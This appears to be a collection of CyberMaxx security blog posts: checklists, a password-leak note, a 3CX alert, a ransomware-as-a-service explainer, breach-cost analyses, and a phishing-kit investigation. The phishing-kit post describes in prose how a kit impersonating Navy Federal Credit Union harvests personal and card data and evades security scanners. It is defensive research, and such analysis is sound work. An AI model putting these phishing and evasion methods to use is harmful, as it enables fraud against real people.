Overview

In this exclusive webinar, CyberMaxx CISO Thomas Pioreck will walk you through a real-world breach scenario—highlighting the critical decisions that can either prevent or escalate a cyber crisis.

Key takeaways:

• The full impact of cyber-attacks—beyond financial loss
• How integrated cybersecurity tools can stop threats in their tracks
• Lessons from organizations that successfully defended against attacks

This session is essential for business leaders, IT professionals, and anyone responsible for safeguarding operations.

Featuring:
Lisa Burke, Chief Customer Officer at CyberMaxx| Thomas Pioreck, CISO at CyberMaxx | Lee Crockett, Director of Sales at Advanced Logic

The post On Demand Webinar: Avoiding Your Worst Day – What Every Business Leader Needs to Know About Cybersecurity appeared first on CyberMaxx.

Below we’ve outlined nine activities that should be performed ahead of time to make sure you, your teams, and your organizations are prepared.

#1 Incident Response Plan Review

Review the IR SOP (incident response standard operating procedure) and ensure the details are correct and up to date. Identify who will be available and reachable during the holidays ahead of time, and rehearse before the time off. Do a test run, can everyone be contacted and join a bridge within your required timeframe? If not, plan around this now. An escalation tree is worthless if it cannot be executed correctly.

#2 Supply Chain Review

Review vendors whose products or services operate in your environment. This extends to both hardware and service offerings. Do they match your organization’s security standards? We have seen an increasing number of attacks that target service vendors year-on-year.

#3 Penetration Test

When was your last offensive engagement? Have you reviewed these findings and completed the recommended actions? Focus on architectural changes, minimizing the attack surface can provide more breathing space before coordinating a threat response.

#4 Network Assessment

• Can you answer the following questions:
• Do you have in-depth visibility into your network?
• What does your current inventory look like?
• Can you quarantine a threat quickly and reactively?
• Do you have EDR (Endpoint Detection and Response)?
• Who can access your network? Do you have a BYOD (bring your own device) policy? If so, do you have NAC (network access controls) in place? What about mobile devices?
• Do you have failover in place in the event a critical asset is taken offline?

Attackers thrive in blind spots in your network. Be sure to include printers, VoIP, IoT devices, and cloud in this review.

#5 & #6 Vulnerability Assessment + Patch Management

This is a broad area, and requires the following to complete effectively:

• Visibility into your network
• Vulnerability Assessment of exposed assets

Where are you most vulnerable? What can you patch today? What are your most critical vulnerabilities? Are you up to date? There could be a potential chain of vulnerabilities that may lead to widespread impact.

Do you have public-facing assets, and if so – can you coordinate a patch of a 0day within 24 hours? If not, it shouldn’t be exposed. There are only two types of vulnerabilities; the ones you know about and the ones you don’t. We are operating on the attacker’s home ground here and they often have more information than the away team.

#7 Risk Assessment

Complete a risk assessment to answer the following questions:

• What are the current threats affecting you today – and leading up to the holiday season? This includes both internal and external threats.
• Who might be targeting your organization? Have they potentially targeted others in the same or similar industry vertical? Similar industries use similar software; making it easier for an attacker to rapidly target through multiple victims.
• Have you completed a vulnerability assessment? Is your patch management up to date?

#8 Awareness Training

Are the company staff aware of threats, and what to look for? Put another phishing assessment on the calendar if one hasn’t been completed in the past 90 days. How do your business partners make updates to accounting? Can it be impersonated? These are key training questions that should be reviewed regularly.

#9 Tabletop Exercise / Threat Simulation

With the above in mind, it’s time to put it all together. Create a tabletop (or work with your security vendor) to simulate a recent and relevant threat to your organization. Can the appropriate parties join a war room to respond to this threat without prior notice? How long does it take your security team to detect this threat? Simulate a response by quarantining the machine and performing threat eradication.

The goal is to work through PICERL (preparation, identification, containment, eradication, remediation, lessons learned) here, the tabletop is testing your preparedness ahead of an active incident.

Download the PDF below to share with your team

The post CISO Summer Checklist appeared first on CyberMaxx.

Discovery and Initial Findings

The breach was identified by CyberNews, who identified a user under the pseudonym “ObamaCare” who uploaded the file. The leaked data appeared in a dump on underground forums, prompting immediate action by the researchers.

It has been identified that there is a match between sample data leaks and the passwords contained in this new list, confirming that this list is in fact made up of legitimate data

“Xmas came early this year,” posted user “ObamaCare” on the forum.

Impact on Users and Organizations

This list represents a large volume of passwords that are in active use. Additionally, organizations should be aware of brute-force and most likely updated attempts at password spraying with this new password list. Users with weak passwords and without further protections will continue to fall victim to drive-by attacks.

One of the largest benefits of lists like this are the frequency of commonly used passwords, allowing a threat actor to have a greater success rate with fewer passwords. Recent high use passwords typically use formats such as “seasonYear” eg. Summer2024.

Recommendations for Staying Protected and Moving Forward

Organizations who have not yet implemented multi-factored authentication (MFA) or other identity protection measures are at an increased risk of compromise as a result of this updated list.

Ensuring strong passwords are in use and haven’t been reused throughout the organization is critical, and equally important is implementing MFA to prevent success.

The post RockYou2024 Password List appeared first on CyberMaxx.

Below we’ve outlined nine activities that should be performed ahead of time to make sure you, your teams, and your organizations are prepared.

#1 Incident Response Plan Review

Review the IR SOP (incident response standard operating procedure) and ensure the details are correct and up to date. Do a test-run, can everyone be contacted and join a bridge within your required timeframe? If not, plan around this now. An escalation tree is worthless if it cannot be executed correctly.

#2 Supply Chain Review

Review vendors whose products or services operate in your environment. This extends to both hardware and service offerings. Do they match your organization’s security standards? We have seen an increasing number of attacks that target service vendors year-on-year.

#3 Penetration Test

When was your last offensive engagement? Have you reviewed these findings and completed the recommended actions? Focus on architectural changes, minimizing the attack surface can provide more breathing space before coordinating a threat response.

#4 Network Assessment

• Can you answer the following questions:
• Do you have in-depth visibility into your network?
• What does your current inventory look like?
• Can you quarantine a threat quickly and reactively?
• Do you have EDR (Endpoint Detection and Response)?
• Who can access your network? Do you have a BYOD (bring your own device) policy? If so, do you have NAC (network access controls) in place? What about mobile devices?
• Do you have failover in place in the event a critical asset is taken offline?

Attackers thrive in blind spots in your network. Be sure to include printers, VoIP, IoT devices, and cloud in this review.

#5 & #6 Vulnerability Assessment + Patch Management

This is a broad area, and requires the following to complete effectively:

• Visibility into your network
• Vulnerability Assessment of exposed assets

Where are you most vulnerable? What can you patch today? What are your most critical vulnerabilities? Are you up to date? There could be a potential chain of vulnerabilities that may lead to widespread impact.

Do you have public-facing assets, and if so – can you coordinate a patch of a 0day within 24 hours? If not, it shouldn’t be exposed. There are only two types of vulnerabilities; the ones you know about and the ones you don’t. We are operating on the attacker’s home ground here and they often have more information than the away team.

#7 Risk Assessment

Complete a risk assessment to answer the following questions:

• What are the current threats affecting you today – and leading up to the holiday season? This includes both internal and external threats.
• Who might be targeting your organization? Have they potentially targeted others in the same or similar industry vertical? Similar industries use similar software; making it easier for an attacker to rapidly target through multiple victims.
• Have you completed a vulnerability assessment? Is your patch management up to date?

#8 Awareness Training

Are the company staff aware of threats, and what to look for? Put another phishing assessment on the calendar if one hasn’t been completed in the past 90 days. How do your business partners make updates to accounting? Can it be impersonated? These are key training questions that should be reviewed regularly.

#9 Tabletop Exercise / Threat Simulation

With the above in mind, it’s time to put it all together. Create a tabletop (or work with your security vendor) to simulate a recent and relevant threat to your organization. Can the appropriate parties join a war room to respond to this threat without prior notice? How long does it take your security team to detect this threat? Simulate a response by quarantining the machine and performing threat eradication.

The goal is to work through PICERL (preparation, identification, containment, eradication, remediation, lessons learned) here, the tabletop is testing your preparedness ahead of an active incident.

The post CISO Holiday Checklist appeared first on CyberMaxx.

Recently, 3CX – a renowned VoIP provider – experienced a supply chain breach that had a significant impact on its desktop application. Reports indicate that one of the libraries employed in the 3CXDesktopApp was attacked, thus enabling malicious activity to take place. This was brought to light in a post by Crowdstrike on March 29th, 2023. 3CX has since confirmed today that their desktop application was compromised via an infected library used by the app.

Crowdstrike detected what they have referred to as “hand-on-keyboard” in a small number of cases. This suggests that rather than depending solely on automated tools, the perpetrator of this malicious act was manually controlling it. Crowdstrike also mentioned that they saw second-stage payloads being downloaded in some cases but the specifics are unknown at this time.

This incident brings to light an increasing danger of supply chain assaults, where a hacker aims at a third-party feature or service utilized by a goal organization, rather than targeting it directly. Such an attack can be tricky to discover since it allows a culprit to access their victim’s systems via an evidently legitimate route.

While it is unknown how exactly the attackers were able to gain access, what’s certain is that other firms may have also been affected by this same attack vector. Companies must take all possible measures to ensure the safety of their third-party services and components to better protect themselves from such threats.

Who’s Responsible

Currently, there is no confirmed source of the attack. Yet, ransomware groups are a likely culprit, considering their prior attacks on supply chains and external parts. This instance demonstrates the significant risk that ransomware poses to organizations and the necessity for strong cybersecurity measures to be taken in order to guard against these kinds of invasions.

What We’re Doing

CyberMaxx is actively blocking the domains provided by Crowdstrike since yesterday’s (3/29) announcement.

CyberMaxx searched existing EDR customers for the indicators provided by Crowdstrike after the information became available (3/29).

What You Should Do

Companies should be checking their logs for connections to the domains from Crowdstrike – Found here. If companies are using the 3CXDesktopApp, 3CX has recommended that the client be uninstalled and replaced with a new client. Contact 3CX support if you need guidance on this. If the company has an MDR services provider, contacting them immediately is also recommended.

The post Threat Alert: 3CX Suffers a Supply Chain Compromise Affecting It’s Desktop Application appeared first on CyberMaxx.

In order to help foster collective intelligence among the cybersecurity community, CyberMaxx publishes insights and examples of active phishing kits uncovered during our threat research. We believe that by sharing the intelligence available to us with the broader cybersecurity community, organizations can more effectively stay ahead of the ever-evolving threats we all face.

In this series, we will largely be documenting some of the research we have done into how common criminals are also victimizing the general public, a topic often ignored by the industry.

These posts are meant to be educational and informative. In no way are they commenting on the teams and organizations that were targeted. Everyone is under attack. These threats negatively impact the operations of corporations and government entities as well as the lives of innocent consumers.

The CyberMaxx Offensive security team uncovers these in our routine threat research, not during specific client engagements.

Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union

During one of our campaigns of collecting data on phishing kits, we came across one targeting users of the Navy Federal Credit Union.

Let us walk you through the flow of the scam.

When you click on the malicious link, you get served a rather decent simulacrum of the Navy Federal login page.

Can you tell the difference between these two screenshots?

When you are served the login page, it obviously requests you to log in.

So of course, we log in, twice. It tells us to enter our username and password twice. This is really common in these phishing kits.

We then get asked to enter our email and password – twice.

Now they have our login, password, our email, and our password.

But wait, these crooks want more!

Let’s give them our SSN and some other personal information.

Now, because we are feeling really generous, we give them our credit cards.

And we give them our security questions. Just in case they still are having a hard time defrauding us.

Finally, to allay suspicion after handing over pretty much every piece of PII imaginable, we get redirected to the real Navy Federal homepage.

So, to wrap up the “scam walkthrough” section, this kit steals the following information:

• Usernames for Navy Federal
• Passwords for Navy Federal
• Email Address
• Password
• Address
• Telephone Number
• Social Security Number
• MMN (Military Member Number?)
• Drivers Licence Expiry Date
• Drivers Licence State of Issue
• Credit Card Number
• CVV Number
• Credit Card Expiry Number
• Questions and Answers for Security Questions

That, is quite a lot of data to lose to some stupid PHP script. I’d suggest that is plenty enough for a scammer to do a lot of damage to you.

Now, about those PHP scripts. We managed to recover the “phishing kit” package as a ZIP file from the compromised webserver being used to host the phishing site.

After unpacking the phishing kit, we see it has the below structure.

The files “index.php”, “quest.php”, “quest2.php” and “account.php” all simply display various HTML pages that send POST data to “next.php”. They also all include the “includes/antibot.php” file.

The “css” and “images” directories just contain CSS and images required to display the logos, formatting, etc.

Of the PHP files, the three of interest are “email.php”, “next.php”, and “includes/antibot.php”.

The file “email.php” simply defines an email address for logs to be sent to, and a URL for victims to be redirected to – the legitimate Navy Federal website.

The “next.php” file is kind of interesting, it contains the functions that handle sending the inputted data to the scammers email account.

I don’t know who “VeNzA” is, but they seem to be quite a prolific creator of scampages based on a cheeky Google search.

The “includes/antibot.php” page actually is more interesting. It seems to exist to try prevent web scrapers/scanners ran by people like us from finding the kit. It blocks based on IP addresses and user agents.

For readability reasons, here is a screenshot of the script with most of the “blocked” IP’s and user agents deleted.

Note its use of wildcards/regular expressions in the IP addresses to block entire IP ranges, and it checks for substrings in the user agent header to block user agents it doesn’t like.

Further worth noting is that when it blocks you, it adds your user agent, IP address, and a date stamp to a logfile.

I might even speculate this is a way for the phishers to expand their blocklists – kind of a hostile threat intelligence, where silly whitehats are the threats.

Overall, this kit is pretty tragically simple. For each “page” of information the victim supplies, the scammer gets an email. It is pretty much identical to a few other phishing kits we will be showing here – however this one does have the twist of having a rudimentary “anti-security researcher” protection to avoid being detected by web scanners/scrapers.

A future blog post will cover these “anti-whitehat” mechanisms in greater detail, as we have found several variations on the same theme, and they all are pretty interesting.

Borrowing some ideas from them could even be of value to red teams in avoiding their payloads getting ruined by antivirus companies and such.

The post Threat Research Series: Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union appeared first on CyberMaxx.

With a 13% increase from 2021 to 2022 which is equal to the past 5 years’ increases combined, there are no signs that these attacks are going anywhere and organizations and individuals need to be more vigilant than ever before. (Verizon DBIR)

What is RaaS

Extortion or Ransomware as a Service (RaaS) can be thought of as an interpretation of the popular Software as a Service (SaaS) model where users who may not have the time or skill to create and deploy their own ransom will purchase it on the dark web to infect their victims.

The RaaS comes as a kit that is distributed to affiliates and each kit has different features and benefits. Some RaaS kits can include 24/7 support, user reviews, forums, and even offers to bundle services. Prices for a RaaS kit can range significantly from $40 a month to thousands depending on the kit needed. The average ransom demand in 2021 was $6 million.

How Does It Work

The RaaS model follows this outline for operators and affiliates.

RaaS Operators:

• Recruit affiliates on forums and the dark web
• Affiliates gain access to “build their own ransomware package”
• A command and control dashboard is created to track the status of the package
• Victim payment portal is set up
• Victim negotiations assistance
• A dedicated leak site is managed

RaaS Affiliates:

• Pay to use ransomware
• Agrees on the fee per collected ransom
• Targets victims
• Set ransom demands
• Create post-attack user messages
• Compromise the victims
• Execute ransomware
• Communications with victims via chat portals or other channels
• Manage decryption key

4 common RaaS models:

• Monthly subscription for a flat fee
• Affiliate programs, which are the same as a monthly fee model but with a percent of the profits (typically 20-30%)
• going to the ransomware developer
• One-time license fee with no profit sharing
• Pure profit sharing

RaaS is a quick and straightforward way to monetize malware. Through some refined RaaS portals, affiliates can create an account, pay with Bitcoin and start monitoring infection status, and files encrypted, scan their targets, and start making money. Ransomware providers offer a wide range of support options — from online communities, tutorials, documentation, feature updates, and more benefits just like a traditional SaaS product.

Examples

CyberMaxx engineers have noted these RaaS as noteworthy this year so far.

LockBit

LockBit has proven itself to be the world’s most prominent and active ransomware, more than doubling the average ransomware payment by targeting small-to-medium-sized organizations. Dubbed one of the most destructive pieces of software in modern history, LockBit encrypts nearly every file stored on an infected device and drops corresponding ransom notes on victims’ computers.

BlackCat

BlackCat is a notable ransomware family, threatening users worldwide with its unique set of features: possible rebranding of DarkSide, written in Rust (a more secure programming language that offers improved performance and reliable concurrent processing), pays affiliates a comparatively larger share than similar schemes and has launched one of the first public data leaks sites.

Black Basta

Black Basta was only noticed in April 2022 but has become a major player in the RaaS business by using double extortion tactics and attack tools like the QakBot trojan and PrintNightmare exploit.

This ransomware family had multiple successful high-profile attacks back to back:

• American Dental Association
• German-based wind farm operator
• American agricultural equipment manufacturer
• German-based company in construction

Black Basta shows no signs of slowing down. In June 2022 they released a new build to their ransomware stack that is designed to infect VMWare ESXi virtual machines.

Monti

Monti is a relatively new ransomware that is thought to be the same or a rebrand of the Conti ransomware group. Monti encrypts files on Linux systems and possibly now Windows and uses the extension “.puuuk”. Another characteristic of Monti is they operate two separate TOR sites: one for hosting data stolen from victims and another for ransom negotiation.

Currently, the data leak website shows that almost all of the victims have paid their ransoms with the exception of one from Argentina.

Preventing RaaS

In order to help prevent becoming a victim of a RaaS attack, organizations need to develop a robust plan for data security in order to combat the growing trend of ransomware. Since RaaS is so costly to recover from, organizations should consider leveraging solutions designed to detect and prevent threats.

CyberMaxx has identified the following best practices for preventing RaaS:

• Reliable endpoint protections that work in the background 24/7 and can decipher complex algorithms
• Regularly backup systems and devices (a few times a week)
• Validate the backups are working and test the backup/recovery process
• Ensure backups are immutable
• Multiple backups stored in various locations
• Maintain patch programs for vulnerabilities
• Anti-phishing protection
• Train employees and improve security culture

Conclusion

With RaaS being an extremely lucrative business, revenues in 2021 were $20 billion, there is no doubt that we will continue to see it being used more – especially with ransomware attacks rising by 13% that very same year.

There are many things an organization can do to protect against ransomware, but experts recommend being proactive, monitoring continuously, and automating responses to related and enabling attack elements (like phishing). Automation is critical because modern malware attacks move at machine speed and only machines can keep up.

Vulnerability and security incident management solutions can help the security, risk, and IT teams focus by providing playbooks that prioritize and direct action. Data collection, AI, and analytics can make everything less onerous, error-prone, and expensive.

Organizations can use systems to help them anticipate what is most important to their business or mission, optimize processes to minimize exposure, and react quickly when problems arise. This can help businesses avoid potential problems and keep operations running smoothly.

As ransomware attacks continue to grow, it is more important than ever for organizations to have a well-orchestrated IT security infrastructure in place. By doing so, they will be better equipped to weather any malicious attack with less cost and disruption.

The post What is Ransomware as a Service (RaaS)? appeared first on CyberMaxx.

Threat actors continue to get smarter and find ways to cause chaos for organizations, but, it’s not all doom and gloom as the good defenders stay one step ahead with people, processes, and technology to help organizations avoid becoming the victim of a breach.

Russia’s Cyber-attacks on Ukraine

Starting the year off, the world saw the Russian state-sponsored cyber operations deploy DDoS, SMS spam campaigns, wiper malware, air traffic control attacks, and Sandworm malware on Linux systems.

Not stopping there, Russia also utilized phishing emails on Ukrainian military personnel, the Conti ransomware gang, and a two-component malware called FoxBlade for DDoS attacks.

The list continues extensively through the year as the Russian and Ukrainian war has now escalated into a full-on war.

Healthcare is Still a Top Target (And Probably Always Will Be)

The healthcare industry continues to be a top target for cybercriminals with 849 incidents where 571 of those resulting in data exposure (Verizon DBIR 2022 Report).

Healthcare also remains at #1 for the most costly data breaches among all industries reaching $10.10 million this year and expected to grow year over year for the foreseeable future. (IBM cost of a data breach)

The list is extensive for individual organizations that were affected by cyberattacks this year so we will only go over a few in no particular order:

• Eye Care Leaders (ECL) – ECL experienced the largest and most headline-grabbing breach reported this year with approximately 3.6 million patients affected. There was plenty of drama associated with this ransomware attack because of the timing in which the vendor reported the attacks. Several providers filed a lawsuit against the practice management system vendor for “concealing” multiple ransomware attacks and related outages. ECL reported to providers impacted, but not until after the 30-day timeframe required by HIPAA, causing many patient led lawsuits.
• Advocate Aurora Health – In late October, Advocate Aurora reported the disclosure of protected health information to Google and Facebook because of the use of Pixels on their patient portals, website, and applications. The pixels have been removed but not before almost 3 million patients’ IP addresses, insurance information, proxy names, locations, procedure types, and appointment times were leaked. Advocate Aurora is currently defending itself against multiple class action lawsuits in the wake of the Pixel outcome.
• Connexin Software – Pediatric electronic medical records and practice management software vendor, Connexin Software, experienced a network hack and data theft in early December that affected 119 provider offices and some 2.2 million patients. The threat actor gained access to offline patient data used for troubleshooting and removed it from the network. Data stolen includes: names, contact details, SSNs, guarantor names, parent or guardian names, dates of birth, highly specific health insurance information, treatments, procedures, diagnoses, prescriptions, provider names, medical record numbers, and billing and/or claims data.

Additionally, this year saw an increase to 90% of the 10 biggest healthcare breaches that were a result of third-party vendors being infiltrated.

This is on trend with 2021 where vendors were responsible for 60% of the 10 largest healthcare breaches. There is an obvious need for organizations to revisit relationships and contracts with vendors to assess security measures and how these third parties are protecting themselves from potential breaches.

Cyber Insurance Rates Reach New Heights

Cyber insurance is one of the fastest-growing markets and is projected to reach $20 billion by 2025 (Source).

Insurance rates are increasing dramatically as well with one report showing a 24.5% increase in Q1 of 2022 adding onto 2021 Q4’s 74% increase.

The drastic increase in premiums is due to many factors, but the most glaring is the increase in ransomware attacks and the claims made to payout the ransom causing loss ratios for insurance companies.

Cyber insurance underwriters are now more cautious when assessing risk for insureds and will continue to thoroughly review internal security controls and cyber risk procedures.

One positive outcome for the security industry is that insurance providers are requiring that companies either have an in-house MDR solution in place or an outsourced partner to help defend their networks and devices. Without these measures, insurance companies are denying requests for new policies until these steps are taken.

Google Blocks DDoS Attack in June

On June 1st, a Google Cloud Armour customer endured a DDoS attack over HTTPS that peaked at 46 million requests per second (RPS).

This is considered the largest amount of blocked RPS to date being 80% more than the previous record which was 26 million RPS. The attack was 69 minutes and the operations ran according to plan because the customer had already deployed the recommended rule.

Even though the DDoS attack lasted over an hour, the speed at which the requests were sent is impressive. Starting at just 10,000 RPS on the victim’s load balancer, eight minutes later Google Cloud Armour Protection began sending alerts and signals when the load jumped to 100,000 RPS. Two minutes go by and the attack peaked at 46 million RPS and slowly dwindled over the next hour.

Google employees stated that the attackers were not getting the desired outcome and spending more to execute than they were gaining. The malware has not been identified yet but there are signs that point to Mēris botnet that was responsible for other DDoS attacks with close to record RPS.

Google Becomes a Security Player with Mandiant

Although Google Cloud Platform (GCP) was considered to be one of the big three cloud providers, it was in a distant third place after AWS and Microsoft Azure.

Now with the $5.4 billion acquisition of Mandiant, Google looks to become an even bigger player in the security space. GCP looks to combine its already existing security portfolio with Mandiant’s cyber threat intelligence to give it a new more bolstered position for cloud offerings.

Conti Cybercrime Group

The cybercrime group, Conti, attacked Costa Rican healthcare organizations and national businesses with ransomware.

Early in the year on April 15th, the Conti group of cybercriminals deployed its first attack on Costa Rica. The initial attack was on the Ministry of Finance, where the group gained access over a VPN connection using stolen credentials from an installed malware.

From there, a Conti operator gained access to every host on Costa Rica’s interconnected networks, uploaded 672GB of data, and executed ransomware.

The ransom amount was $10 million and came with the threat of attacking the rest of Costa Rica’s ministries if it wasn’t paid.

Costa Rica refused to pay and Conti kept the promise and continued the attacks on the following agencies:

• The Administrative Board of the Electrical Service of the province of Cartago (Jasec)
• The Ministry of Science, Innovation
• Technology and Telecommunications
• The Ministry of Labor and Social Security (MTSS)
• The National Meteorological Institute (IMN)
• Radiographic Costarricense (Racsa)
• The Interuniversity Headquarters of Alajuela
• The Social Development and Family Allowances Fund (FODESAF)
• Costa Rican Social Security Fund (CCSS)

The attacks led to disruptions costing millions of dollars for Costa Rican businesses, healthcare systems, and government agencies.

On May 8th, Costa Rican President declared a national emergency but 11 days later Conti leaders started to disband. The Conti negotiation and news website was down along with chatrooms, servers and proxies began to go offline.

By late June, the data leak site was removed and Conti’s operations were declared dead. The cybercriminal group Conti has since rebranded under several different names but has left its mark, proving that a cyber gang can execute country-wide extortion.

Other Notable Statistics

• Ransomware breaches (outside of healthcare) cost businesses an average of $4.62 million. (Varonis)
• Approximately sixty percent of data breaches are caused by stolen credentials. (Comparitech)
• A breach lifecycle goes undetected for 200 days and takes 77 days to become contained on average
• Nearly half (43%) of all cyber-attacks are specifically targeted at small businesses. (Dataprot)
• Mega breaches (involving $50 million to $65 million records) cost an average of $401 million. This figure is significantly higher than previous estimates and highlights just how costly these types of incidents can be. (Varonis)

The post 2022 in Review…well, most of it, a lot happened appeared first on CyberMaxx.

In this segment, we’ll take a closer look at some of the key factors that can decrease that time, and therefore reduce exposure and cost.

Mitigating Costs

While the time it takes to detect, and then contain a breach has a big impact on the overall cost of a breach, IBM Security has identified 28 factors that can influence the cost of a breach.

Many of these factors can shorten the time, and therefore lower the cost of a data breach, while some others may amplify the costs of a breach.

As always, it’s important to know that these costs aren’t additive, and your own experience may vary. We do believe this is a significant sample size that produces consistent average costs*.

Warning: the following paragraphs contain a lot of numbers. I’ve included these not to bore you, but for you to be able to leverage these very real numbers in creating a business case for help in maturing your cybersecurity program.

Numbers Don’t Lie

The report shows that there are several factors that are associated with the biggest impact on reducing the time and cost of a breach: the use of intelligent technology platforms, the use of an incident response (IR) team, and the use of an MDR/XDR solution.

AI Security Platform

The report refers specifically to the use of an AI security platform, and the evaluation of this factor is fairly recent, so I’ll discount it slightly. The benefit of an AI platform is to be able to leverage technology to ‘learn’ and apply that learning without human intervention, leading to automated decisions and actions for remediation.

While there is great promise for this technology, I will submit that having human intelligence built from extensive experience, combined with the automation that technology provides, can produce excellent results that will reduce the time to identify and remediate incidents.

MTTD/MTTC

Regardless, the report finds that organizations with a high level of automation had an average cost of a breach that was 55.3% lower than organizations with low levels of use. This is mostly related to the Mean Time to Detect (MTTD) and Mean Time to Contain (MTTC), which, combined, showed a drop from 323 days for organizations with no security automation to 249 days on average for organizations with security automation deployed.

To have an IR plan or not?

A majority of organizations in the study had IR plans and testing of IR plans on a regular basis. Nearly three-quarters of organizations in the study said they had an IR plan. At organizations with an IR plan, a little more than half said they regularly tested the IR plan. Breaches at organizations with IR capabilities saw an average cost of a breach of $3.26 million in 2022, compared to $5.92 million at organizations without IR capabilities. This clearly shows a cost benefit to having and testing an IR plan.

XDR, Please!

XDR technologies in use impacted average breach costs with a savings of 9.2%. While these savings may appear modest at first glance, the real impact comes in the number of time organizations save in detecting and containing a breach when they use XDR: almost one month. We shared in Part 1 that time is a major factor in determining the impact of a breach. The average time to identify and contain a data breach was 10% lower with organizations with XDR technologies than those with no XDR technologies.

There are also a number of factors that increase the cost of a breach, including security system complexity and a highly remote workforce. For example, organizations with a high level of security system complexity contributed to a $2.47 million higher cost of a breach, 58% higher than the average. Simplicity seems to be better when it comes to the technology of cybersecurity.

Remote Work

Remote working has had considerable effects on the cost of a breach when remote work was a factor in causing the breach, such as a remote-working employee having credentials stolen. The study also found that breach costs were highest for organizations with many of their employees working remotely. The difference between the highest and lowest share of employees working remotely was $1.11 million, a difference of 24.4%.

The Skills Gap

As warned, that’s a lot of numbers. The bottom line is that there are a lot of factors that can increase or decrease the effectiveness of a cybersecurity program. In addition to all those factors, there is another pretty big inhibitor: the skills gap.

Many organizations are struggling to fill open positions on their security teams.

In the report, those organizations that said they were sufficiently staffed saw considerable cost savings in terms of data breach costs, compared to those without enough employees to staff their teams. At organizations with a sufficiently staffed security team, the average cost of a data breach was lower than average at $4.01 million. In contrast, the average cost of a data breach was 12.8% higher at organizations with insufficiently staffed security teams.

CyberMaxx can help with all of the above. In fact, we’ve demonstrated this consistently over the past 20 years, with many satisfied customers. We believe that the Mean Time to Detect (MTTD) for a cybersecurity incident should be 15 minutes, not 200 days.

15 minutes…not 200 days!

We’ve consistently beaten that objective, through the combination of experienced, intelligent people, proven processes developed over 20 years, and XDR technology to provide intelligence and automation in support of the people and processes.

We can and want to help!

CyberMaxx can help you develop your incident response strategy and plan, and help you test it to make sure it is effective. CyberMaxx can extend your team to provide 24×7 coverage, or we can be your team.

* The IBM Security Cost of a Data Breach Report 2022 studied 550 organizations of various sizes impacted by data breaches between March 2021 and March 2022 across 17 countries and in 17 different industries

The post Reducing the Cost of a Data Breach: Part 2 – Mitigating Costs appeared first on CyberMaxx.

What professionals in the data security industry do is hard, and the ‘bad guys’ seem to be increasingly creative in devising ways to exploit vulnerabilities.

It’s what we at CyberMaxx like to call the digital arms race – bad actors are always trying to find new ways to infiltrate networks and devices with the latest technology and the ‘good guys’ are meeting the challenge to protect organizational assets.

The thing is, we know a lot about how to reduce the cost and the likelihood of a breach, thanks to reports like the IBM Security/Ponemon Institute annual Cost of a Data Breach Report, which has been produced each of the last 17 years.

If you’re out there fighting the good fight every day, there’s a lot of great information contained in these reports. Information that can help make the business case to secure funding and resources to save your organization time, money, and reputation.

This series is intended to highlight several key points and provide real solutions for this very real problem – It is not intended to be a full de-brief of the report, which we encourage you to read in its entirety.

Time

It turns out that the time it takes to detect, and then contain a breach has a big impact on the overall cost of a breach.

The time to identify a breach is the time it takes to detect that an incident has occurred. The time to contain a breach refers to the time it takes to resolve an incident after it’s been detected and to restore service.

To show where improvements can be made, let’s take a look at data showing the time to detect and contain over the past few years. In the chart below (Figure 8 from the report), we see that over the past seven years not much has changed significantly. The shocking number that pops out is that in 2022 it still took over 200 days on average* to identify that a breach occurred.

That’s more than six months just to detect the breach.

And another two months after detection to contain the incident.

Just imagine if better safeguards were in place in order to cut down on the amount of time a breach incident was active, or even better yet, prevent the breach from happening in the first place.

The Impact of Time on the Cost of a Breach

According to the report, a data breach lifecycle (total time between the breach, detection, and containment) of less than 200 days was associated with an average cost of $3.74 million in 2022, which is $1.12 million less than a lifecycle of more than 200 days ($4.86 million). So shortening the time to less than 200 days is fairly significant, a 26.5% reduction in the cost of a breach.

Apparently, Time is Money

At CyberMaxx, we believe that a data breach lifecycle of 200 days, while less expensive than a data breach lifecycle of more than 200 days, is still much too long (Remember, we’re still talking about half of a year just to detect).

While the referenced report does not calculate the savings of reducing the lifecycle by another 25, 50, 75, or even 90%, we believe early detection and response is one of the keys to a successful cybersecurity program.

CyberMaxx has extremely aggressive goals for detection and response, which we consistently exceed.

How? With a proven combination of people, process, and technology.

We’ll take a closer look at some of the key factors related to reducing the time to detect and respond, and therefore the cost mitigation of a breach, in Part 2.

* The IBM Security Cost of a Data Breach Report 2022 studied 550 organizations of various sizes impacted by data breaches between March 2021 and March 2022 across 17 countries and in 17 different industries

The post Reducing the Cost of a Data Breach: Part 1 – Time appeared first on CyberMaxx.